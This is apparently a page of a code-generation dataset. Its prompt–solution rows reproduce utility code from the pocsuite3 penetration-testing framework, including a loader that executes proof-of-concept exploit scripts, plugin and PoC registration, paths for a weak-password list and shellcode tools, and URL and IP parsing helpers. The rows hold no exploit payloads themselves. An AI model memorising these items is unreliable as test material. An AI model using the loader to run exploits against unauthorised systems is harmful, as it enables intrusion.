    """Instantiate *plugin_class* and store it in the knowledge base under
    its category, keyed by top-level module name, unless already present."""
    name = plugin_class.__module__.split('.')[0]
    registry = kb.plugins[plugin_class.category]
    if name in registry:
        return
    registry[name] = plugin_class()
161,778 | import hashlib
The provided code snippet includes necessary dependencies for implementing the `cachedmethod` function. Write a Python function `def cachedmethod(f, cache={})` to solve the following problem:
Method with a cached content.
Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
Here is the function:
def cachedmethod(f, cache={}):
    """
    Method with a cached content.

    The mutable default ``cache`` is deliberate: all wrapped callables share
    one process-wide cache unless a dedicated dict is passed in.

    Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
    """
    def wrapper(*args, **kwargs):
        raw_key = "|".join(str(part) for part in (f, args, kwargs)).encode()
        key = int(hashlib.md5(raw_key).hexdigest(), 16) & 0x7fffffffffffffff
        try:
            return cache[key]
        except KeyError:
            cache[key] = f(*args, **kwargs)
            return cache[key]

    return wrapper
161,779 | import re
import pkg_resources
import importlib.machinery
import importlib.util
from importlib.abc import Loader
from pocsuite3.lib.core.common import (
multiple_replace, get_filename, get_md5, get_file_text,
is_pocsuite3_poc, get_poc_requires, get_poc_name)
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.settings import POC_IMPORTDICT
class PocLoader(Loader):
    """importlib Loader that turns a PoC file (or in-memory source) into a
    Python module, rewriting old-style imports and yaml/nuclei templates."""

    def __init__(self, fullname, path):
        # fullname: dotted module name; path: file path or pocsuite:// pseudo URL
        self.fullname = fullname
        self.path = path
        self.data = None  # optional in-memory PoC source, set via set_data()

    def set_data(self, data):
        """Attach raw PoC source so get_data() can serve it without disk access."""
        self.data = data

    def get_filename(self, fullname):
        return self.path

    def get_data(self, filename):
        """Return PoC source: in-memory for pocsuite:// paths, else from disk.
        Old-style (pre-pocsuite3) PoCs get their imports rewritten via
        POC_IMPORTDICT so they run against the current package layout."""
        if filename.startswith('pocsuite://') and self.data:
            if not is_pocsuite3_poc(self.data):
                data = multiple_replace(self.data, POC_IMPORTDICT)
            else:
                data = self.data
        else:
            code = get_file_text(filename)
            if not is_pocsuite3_poc(code):
                data = multiple_replace(code, POC_IMPORTDICT)
            else:
                data = code
        return data

    def check_requires(data):
        # NOTE(review): defined without ``self`` yet invoked below as
        # ``self.check_requires(poc_code)`` — presumably a @staticmethod
        # decorator was lost in transcription; confirm against upstream.
        """Verify the packages named in the PoC's install_requires field are
        importable, aborting with an error message when one is missing."""
        requires = get_poc_requires(data)
        requires = [i.strip().strip('"').strip("'") for i in requires.split(',')] if requires else ['']
        if requires[0]:
            poc_name = get_poc_name(data)
            info_msg = 'PoC script "{0}" requires "{1}" to be installed'.format(poc_name, ', '.join(requires))
            logger.info(info_msg)
            try:
                for r in requires:
                    r = r.replace(' ', '')
                    # "install_name:import_name" syntax; import name defaults
                    # to the install name with any version spec stripped.
                    install_name, import_name = (r.split(':') + [''])[0:2]
                    t = re.split('>|<|=|~', install_name)
                    if len(t) > 1:
                        install_name = t[0]
                    if not import_name:
                        import_name = install_name
                    __import__(import_name)
                    try:
                        ver = pkg_resources.get_distribution(install_name).version
                    except Exception:
                        ver = 'unknown'
                    logger.info(f'{install_name}=={ver} has been installed')
            except ImportError:
                err_msg = f'{install_name} not found, try install with "python -m pip install {install_name}"'
                logger.error(err_msg)
                raise SystemExit

    def exec_module(self, module):
        """Compile and execute the PoC source inside *module*'s namespace."""
        filename = self.get_filename(self.fullname)
        poc_code = self.get_data(filename)
        # convert yaml template to pocsuite3 poc script
        if filename.endswith('.yaml') and re.search(r'matchers:\s+-', poc_code):
            from pocsuite3.lib.yaml.nuclei import Nuclei
            poc_code = str(Nuclei(poc_code))
        self.check_requires(poc_code)
        obj = compile(poc_code, filename, 'exec', dont_inherit=True, optimize=-1)
        try:
            exec(obj, module.__dict__)
        except Exception as err:
            logger.error("Poc: '{}' exec arise error: {} ".format(filename, err))
def get_md5(value):
    """Return the hex MD5 digest of *value*; str input is UTF-8 encoded first."""
    data = value.encode(encoding='UTF-8') if isinstance(value, str) else value
    return hashlib.md5(data).hexdigest()
logger = LOGGER
kb = AttribDict()
def load_string_to_module(code_string, fullname=None):
    """Execute PoC source *code_string* as a module and return its PoC object.

    The module name defaults to ``pocs_<md5-of-source>``. Returns None when
    execution did not register a PoC in ``kb.registered_pocs``; import
    failures are logged and re-raised.
    """
    try:
        module_name = fullname if fullname is not None else 'pocs_{0}'.format(get_md5(code_string))
        pseudo_path = 'pocsuite://{0}'.format(module_name)
        loader = PocLoader(module_name, pseudo_path)
        loader.set_data(code_string)
        spec = importlib.util.spec_from_file_location(module_name, pseudo_path, loader=loader)
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)
        return kb.registered_pocs[module_name]
    except KeyError:
        # exec_module ran but never registered a PoC under this name.
        return None
    except ImportError:
        logger.error("load module '{0}' failed!".format(fullname))
        raise
161,780 | import re
import pkg_resources
import importlib.machinery
import importlib.util
from importlib.abc import Loader
from pocsuite3.lib.core.common import (
multiple_replace, get_filename, get_md5, get_file_text,
is_pocsuite3_poc, get_poc_requires, get_poc_name)
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.settings import POC_IMPORTDICT
kb = AttribDict()
def register_poc(poc_class):
    """Instantiate *poc_class* once per top-level module and make it current.

    Re-registering the same module only re-points ``kb.current_poc`` at the
    existing instance instead of constructing a new one.
    """
    module = poc_class.__module__.split('.')[0]
    if module not in kb.registered_pocs:
        kb.registered_pocs[module] = poc_class()
    kb.current_poc = kb.registered_pocs[module]
161,781 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def read_binary(filename):
    """Read the file at *filename* and return its raw content.

    Args:
        filename: Path of the file to read.

    Returns:
        bytes: The complete file content.
    """
    # The original pre-initialized ``content = ''`` (a str) before overwriting
    # it with bytes — a dead assignment of the wrong type, dropped here.
    with open(filename, 'rb') as f:
        return f.read()
161,782 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
paths = AttribDict()
The provided code snippet includes necessary dependencies for implementing the `set_paths` function. Write a Python function `def set_paths(root_path)` to solve the following problem:
Sets absolute paths for project directories and files
Here is the function:
def set_paths(root_path):
    """Populate the global ``paths`` registry with absolute project paths.

    Package assets (data, plugins, pocs) are anchored at *root_path*; user
    state (shell histories, tmp dir, output, rc file) lives under the home
    directory in ``~/.pocsuite``.
    """
    join = os.path.join
    paths.POCSUITE_ROOT_PATH = root_path
    paths.POCSUITE_DATA_PATH = join(root_path, "data")
    paths.POCSUITE_PLUGINS_PATH = join(root_path, "plugins")
    paths.POCSUITE_POCS_PATH = join(root_path, "pocs")
    paths.USER_POCS_PATH = None
    paths.WEAK_PASS = join(paths.POCSUITE_DATA_PATH, "password-top100.txt")
    home = os.path.expanduser("~")
    paths.POCSUITE_HOME_PATH = home
    dot_pocsuite = join(home, ".pocsuite")
    paths.API_SHELL_HISTORY = join(dot_pocsuite, "api.hst")
    paths.OS_SHELL_HISTORY = join(dot_pocsuite, "os.hst")
    paths.SQL_SHELL_HISTORY = join(dot_pocsuite, "sql.hst")
    paths.POCSUITE_SHELL_HISTORY = join(dot_pocsuite, "pocsuite.hst")
    paths.POCSUITE_CONSOLE_HISTORY = join(dot_pocsuite, "console.hst")
    paths.POCSUITE_TMP_PATH = join(dot_pocsuite, "tmp")
    paths.POCSUITE_RC_PATH = join(home, ".pocsuiterc")
    # Honour a pre-set output location; otherwise default under ~/.pocsuite.
    paths.POCSUITE_OUTPUT_PATH = paths.get("POCSUITE_OUTPUT_PATH", join(dot_pocsuite, "output"))
    paths.SHELLCODES_DEV_PATH = join(paths.POCSUITE_TMP_PATH, "tools")
161,783 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def data_to_stdout(data, bold=False):
    """Write *data* to the console stream unless quiet mode is enabled.

    String payloads are re-encoded for the console first; anything else is
    passed through unchanged. Flush failures (e.g. broken pipe) are ignored.
    """
    if conf.get('quiet', False):
        return
    message = stdout_encode(data) if isinstance(data, str) else data
    sys.stdout.write(set_color(message, bold))
    try:
        sys.stdout.flush()
    except IOError:
        pass
IS_WIN = True if (sys.platform in ["win32", "cygwin"] or os.name == "nt") else False
BANNER = """\033[01;33m
,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' \033[0m\033[4;37m%s\033[0m
""" % (
(31 + hash(REVISION) % 6) if REVISION else 30,
VERSION_STRING.split("/")[-1],
SITE,
)
The provided code snippet includes necessary dependencies for implementing the `banner` function. Write a Python function `def banner()` to solve the following problem:
Function prints pocsuite banner with its version
Here is the function:
def banner():
    """Print the pocsuite banner (including version) to the console."""
    if IS_WIN:
        # Windows consoles need colorama to interpret the ANSI colour codes.
        coloramainit()
    data_to_stdout(BANNER)
161,784 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def clear_colors(message):
    """Strip ANSI colour escape sequences from *message*.

    Falsy inputs (None, empty string) are returned unchanged.
    """
    if not message:
        return message
    return re.sub(r"\x1b\[[\d;]+m", "", message)
161,785 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def extract_regex_result(regex, content, flags=0):
    """Return the 'result' group from a match of *regex* against *content*.

    None is returned when either argument is falsy, when the pattern has no
    named ``result`` group, or when the pattern does not match.

    >>> extract_regex_result(r'a(?P<result>[^g]+)g', 'abcdefg')
    'bcdef'
    """
    if not (regex and content and "?P<result>" in regex):
        return None
    match = re.search(regex, content, flags)
    return match.group("result") if match else None
The provided code snippet includes necessary dependencies for implementing the `get_latest_revision` function. Write a Python function `def get_latest_revision()` to solve the following problem:
Retrieves the latest revision from the official repository
Here is the function:
def get_latest_revision():
    """
    Retrieves latest revision from the official repository

    Returns:
        str or None: a version string such as '2.0.5', or None on any
        failure (network error, unexpected page content).
    """
    ret = None
    try:
        # requests.get is inside the try so network failures also fail soft.
        resp = requests.get(url="https://raw.githubusercontent.com/knownsec/pocsuite3/master/pocsuite3/__init__.py")
        # Use .text (str), not .content (bytes): the str regex below would
        # raise TypeError against bytes and the function would always
        # return None.
        content = resp.text
        ret = extract_regex_result(r"__version__\s*=\s*[\"'](?P<result>[\d.]+)", content)
    except Exception:
        pass
    return ret
161,786 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def data_to_stdout(data, bold=False):
    """Emit *data* on stdout, honouring the global quiet flag.

    str payloads go through stdout_encode; other payloads are written as-is.
    """
    quiet = conf.get('quiet', False)
    if not quiet:
        if isinstance(data, str):
            payload = stdout_encode(data)
        else:
            payload = data
        sys.stdout.write(set_color(payload, bold))
        try:
            sys.stdout.flush()
        except IOError:
            # Broken pipe / closed stream: nothing useful to do.
            pass
The provided code snippet includes necessary dependencies for implementing the `poll_process` function. Write a Python function `def poll_process(process, suppress_errors=False)` to solve the following problem:
Checks for process status (prints . if still running)
Here is the function:
def poll_process(process, suppress_errors=False):
    """Block until *process* exits, printing a '.' heartbeat every second.

    Unless *suppress_errors* is set, a short status line describing the exit
    (success, killed by signal, or non-zero return code) is printed when the
    process finishes.
    """
    while True:
        data_to_stdout(".")
        time.sleep(1)
        rc = process.poll()
        if rc is None:
            continue
        if not suppress_errors:
            if rc == 0:
                data_to_stdout(" done\n")
            elif rc < 0:
                # Negative poll() value means killed by that signal number.
                data_to_stdout(" process terminated by signal {}\n".format(rc))
            else:
                data_to_stdout(" quit unexpectedly with return code {}\n".format(rc))
        break
161,787 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def urlparse(address):
    """Parse *address*, defaulting to a tcp:// scheme when none is present.

    Bare IP literals are wrapped so urllib parses them correctly (IPv6 hosts
    get brackets). See:
    https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url
    """
    try:
        version = ip_address(address).version
    except ValueError:
        pass
    else:
        host = address if version == 4 else f'[{address}]'
        return urllib.parse.urlparse(f'tcp://{host}')
    # Not a bare IP: prepend a scheme only if none is already present.
    if not re.search(r'^[A-Za-z0-9+.\-]+://', address):
        address = f'tcp://{address}'
    return urllib.parse.urlparse(address)
The provided code snippet includes necessary dependencies for implementing the `parse_target_url` function. Write a Python function `def parse_target_url(url)` to solve the following problem:
Parse target URL
Here is the function:
def parse_target_url(url):
    """Normalize *url* to a web URL.

    Non-web schemes (e.g. the tcp:// default applied by the local urlparse)
    are rewritten to http://, or https:// when the port ends in 443.
    Unparseable input is returned untouched.
    """
    try:
        parsed = urlparse(url)
        if parsed.scheme.lower() not in ['http', 'https', 'ws', 'wss']:
            scheme = 'https' if str(parsed.port).endswith('443') else 'http'
            url = parsed._replace(scheme=scheme).geturl()
    except ValueError:
        pass
    return url
161,788 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
# Matches URLs beginning with http(s)://, www. or ftp. prefixes.
URL_ADDRESS_REGEX = r"(?:(?:https?):\/\/|www\.|ftp\.)(?:\([-a-zA-Z0-9+&@#\/%=~_|$?!:,.]*\)|[-a-zA-Z0-9+&@#\/%=~_|$?!:,.])*(?:\([-a-zA-Z0-9+&@#\/%=~_|$?!:,.]*\)|[a-zA-Z0-9+&@#\/%=~_|$])"


def is_url_format(value):
    """Return True if *value* starts with a URL (http(s)://, www. or ftp.)."""
    # bool(...) replaces the original if/return True/else/return False ladder.
    return bool(value and re.match(URL_ADDRESS_REGEX, value))
161,789 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
# Matches domain-like tokens, optionally with a path segment and a port.
URL_DOMAIN_REGEX = (
    r"(?:www)?(?:[\w-]{2,255}(?:\.\w{2,6}){1,3})(?:/[\w&%?#-]{1,300})?(?:\:\d+)?"
)


def is_domain_format(value):
    """Return True if *value* starts with a domain-like token."""
    # bool(...) replaces the original if/return True/else/return False ladder.
    return bool(value and re.match(URL_DOMAIN_REGEX, value))
161,790 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
# Dotted-quad IPv4 with each octet constrained to 0-255.
IP_ADDRESS_REGEX = r"\b(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\b"


def is_ip_address_format(value):
    """Return True if *value* starts with a valid dotted-quad IPv4 address."""
    # bool(...) replaces the original if/return True/else/return False ladder.
    return bool(value and re.match(IP_ADDRESS_REGEX, value))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.